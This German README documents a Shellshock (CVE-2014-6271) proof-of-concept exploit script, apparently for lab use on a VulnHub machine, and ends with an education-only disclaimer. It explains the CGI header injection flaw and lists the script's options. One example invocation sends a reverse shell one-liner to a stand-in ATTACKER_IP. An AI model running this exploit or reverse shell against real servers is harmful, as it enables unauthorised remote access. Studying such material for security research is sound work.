
CVE-2014-6271 Exploit | by infrar3d
xpl0ited von infrar3d
Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2014-6271 (Shellshock).
Shellshock ist eine kritische Schwachstelle in GNU Bash, bei der speziell präparierte Umgebungsvariablen die Ausführung beliebiger Befehle ermöglichen.
Wenn ein Webserver HTTP-Header an CGI-Skripte übergibt, die Bash aufrufen, kann ein Angreifer über diese Header Befehle einschleusen.
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help diese Meldung anzeigen und beenden
-a | --address Zieladresse (Standard ist "localhost")
-p | --port Zielport (Standard ist 80)
-f | --file Zieldatei (Standard ist "/cgi-bin/shell.sh")
-c | --command auf dem Zielrechner auszuführender Befehl (Standard ist "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(getestet auf der VulnHub-Maschine "Hacksudo - Thor")
Diese Software und der Proof-of-Concept-Code werden ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.
Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten. Ethisch und verantwortungsbewusst nutzen.